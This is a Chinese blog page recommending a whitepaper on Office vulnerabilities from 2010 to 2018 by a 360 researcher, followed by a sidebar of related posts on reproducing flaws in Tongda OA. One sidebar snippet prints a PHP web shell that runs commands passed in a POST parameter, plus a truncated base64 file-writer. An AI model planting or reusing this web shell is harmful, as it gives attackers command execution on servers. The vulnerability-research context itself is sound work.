[白皮书]宏观视角下的office漏洞(2010-2018)

最新推荐文章于 2024-05-26 15:44:30 发布
最新推荐文章于 2024-05-26 15:44:30 发布
阅读量260 收藏
点赞数 1
分类专栏: 白皮书

360高级威胁应对团队银雁冰dalao对 2010 年到 2018 年出现的 Office 相关 0day/1day 漏洞,也是在Bluehat Shanghai 2019演讲内容的一个拓展性总结。
文章对近年来的office漏洞总结分析的非常全面,是研究office漏洞的人不可多得的佳作(银雁冰dalao大佬的文章基本都是精华),里面提到的关于各种类型office漏洞都非常值得一调,个人认为可以说是发现和挖掘office的基础吧,我也会把调完和理解这些漏洞当作是我这几年的想要达成的目标!
宏观视角下的office漏洞(2010-2018)
https://www.anquanke.com/post/id/180067#h3-11 —银雁冰
https://www.microsoft.com/china/bluehatshanghai/2019/ ----BlueHat Shanghai 2019
虚拟沙箱捕获0day那篇 就是银雁冰大佬的文章,不过感觉银雁冰dalao意犹未尽,所以才会有这个补充总结,故归为白皮书这类。

QQQqQqqqqrrrr
关注
专栏目录
OA-命令执行漏洞复现
千寻的博客
03-23 2912
文章目录0x01介绍0x02原理0x03影响版本0x04环境搭建0x05漏洞复现方法一:通过抓包,改包进行利用方法二:直接利用免责声明本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责! 0x01介绍 OA(Office Anywhere网络智能办公系统)办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。 OA为各行业不同规模的众多用户提...
Office 365 安全与合规白皮书_Office-365-Security-and-Compliance-CN1
08-03
Office 365 安全与合规白皮书】 安全与合规性是现代企业IT环境中不可或缺的一部分,尤其是在全球范围内,信息安全的需求日益增强。随着信息技术的快速发展和多设备、多平台、多地点的访问模式变得普遍,确保信息...
宏观视角下的office漏洞2010-2018
360技术
06-21 1091
奇技指南本文作者银雁冰:360高级威胁应对团队·高级威胁自动化组本文来自安全客,原文地址:https://www.anquanke.com/post/id/180067...
通达oa漏洞复现 
qq_44877321的博客
02-14 1670
漏洞复现
通达OA 身份认证绕过漏洞复现
12-12 1637
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。
漏洞复现-通达OA】通达OA前台任意用户登录漏洞
xiaokp7的博客
06-18 2668
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA < 11.5.200417存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器。
中国数字经济白皮书(2015-2018合集)
04-17
中国信息通信研究院已连续五年发布数字经济白皮书,测算方法被纳入G20《数字经济测算工具箱》,测算结果被广泛引用。 【目 录】 1、中国信息经济研究报告(2015) ...4、中国数字经济发展与就业白皮书2018年)
区块链-2018白皮书
02-25
《区块链-2018白皮书》是中国2018年对区块链行业进行深度剖析的一份重要报告,旨在提供全面、深入的行业洞察。以下是对该报告中关键知识点的详细阐述: 一、区块链概述 区块链是一种分布式数据库技术,通过去中心化...
精品报告系列-2018年WPSOffice用户白皮书.pdf
04-29
本报告是2018年的“精品报告系列-2018年WPS Office用户白皮书”,由艾瑞咨询(iResearch)发布。报告主要探讨了WPS Office用户的行为特点、行业发展趋势以及WPS Office平台的价值。 【核心发现】 1. 办公软件的多...
OA-tongda-RCE:Office Anywhere网络智能办公系统
03-11
OA-通达-RCE | Office Anywhere网络智能办公系统 后台Getshell 无需身份认证 任意文件上传防御/ispirit/im/upload.php 本地文件包含漏洞/ispirit/interface/gateway.php 命令执行绕过: <?php $command=$_POST['cmd']; $wsh = new COM('WScript.shell'); $exec = $wsh->exec("cmd /c ".$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?> GetWebshel​​l <?php $fp = fopen('readme.php', 'w'); $a = base64_decode("PD9waHAKQGV
Office Anywhere使用详解
11-22
Office Anywhere使用详解
[ 漏洞复现篇 ]通达 OA11.6 文件删除 + 任意文件上传 rce 漏洞复现
qq_51577576的博客
03-28 3874
🍬 博主介绍 👨‍🎓 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋 🙏作者水平有限,欢迎各位大佬指点,相互学习进步! 目录 🍬 博主介绍 1. 漏洞简介 2.漏洞影响版本 3. 漏洞环境搭建 4. 漏洞复现 5. Exp 6.漏洞修复 1. 漏洞简介 通达...
漏洞复现-通达OA】通达OA down 未授权员工信息泄露漏洞
xiaokp7的博客
02-18 284
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA down 未授权员工信息泄露漏洞
漏洞复现】通达OA inc/package/down.php接口未授权漏洞
最新发布
weixin_42620428的博客
05-26 531
通达OA(Office Anywhere网络智能办公系统)是由通达信科科技自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。
通达OA v11.7 auth_mobi.php 在线用户登录漏洞复现
花开烟雨楼的博客
03-22 2899
通达OA,Office Anywhere的首字母,是通达信科旗下的品牌。通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统通达OA,Office Anywhere的首字母,是通达信科旗下的品牌。通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统。
"人工智能安全白皮书-2018:技术进步与风险控制
人工智能安全白皮书-2018总结 《人工智能安全白皮书-2018》是中国信息通信研究院安全研究所于2018年9月发布的一份重要文件。该文件对当前人工智能应用中的安全问题进行了深入研究和分析,并提出了相应的解决方案和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值